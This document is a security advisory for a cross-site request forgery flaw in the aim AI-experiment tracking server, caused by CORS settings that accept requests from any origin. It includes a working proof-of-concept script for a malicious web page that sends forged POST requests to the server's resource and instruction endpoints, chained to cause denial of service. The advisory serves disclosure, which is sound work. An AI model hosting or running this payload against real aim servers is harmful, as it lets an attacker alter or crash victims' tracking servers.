Cross-site Request Forgery (CSRF) Affecting aim package, versions [0,]

aim is a super-easy way to record, search and compare AI experiments.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to overly permissive CORS settings that allow cross-origin requests from all origins. An attacker can manipulate the state of the application by sending malicious requests from a browser that the victim has authenticated with.

1. Start the tracking server by running the following commands:

aim init
aim server

2. Host the following payload on a malicious website:

<script>
    const trackingServer = "http://x.x.x.x:53800/";
    const resourceEndpoint = "tracking/client_1/get-resource";
    const instructionEndpoint = "tracking/client_1/read-instruction";

const req = new XMLHttpRequest();
// This chains https://huntr.com/bounties/abcea7c6-bb3b-45e9-aa15-9eb6b224451a, causing
// denial of service. But it could in practice chain any other existing vulnerability,
// or just regular endpoint behaviour.

req.open(&quot;POST&quot;, trackingServer + resourceEndpoint);
req.send(JSON.stringify({
    &quot;resource_handler&quot;: &quot;my_resource&quot;,
    &quot;resource_type&quot;: &quot;Repo&quot;,
    &quot;args&quot;: &quot;AAAAAAABAAAABw==&quot;
}));

// A bit lazy, just make sure to do this request *after* the first one is complete.
setTimeout(() =&gt; {
    const req = new XMLHttpRequest();
    req.open(&quot;POST&quot;, trackingServer + instructionEndpoint);
    req.send(JSON.stringify({
        &quot;resource_handler&quot;: &quot;my_resource&quot;,
        &quot;method_name&quot;: &quot;from_path&quot;,
        &quot;args&quot;: &quot;AAAAAAABAAAABgoAAAD+AAAAAAAAAAD+ABQAAAAEYWltOi8vMC4wLjAuMDo1MzgwMA==&quot;
    }));
}, 1000)

</script>

3. Visit the website with the machine running the tracking server.

• Vulnerable Code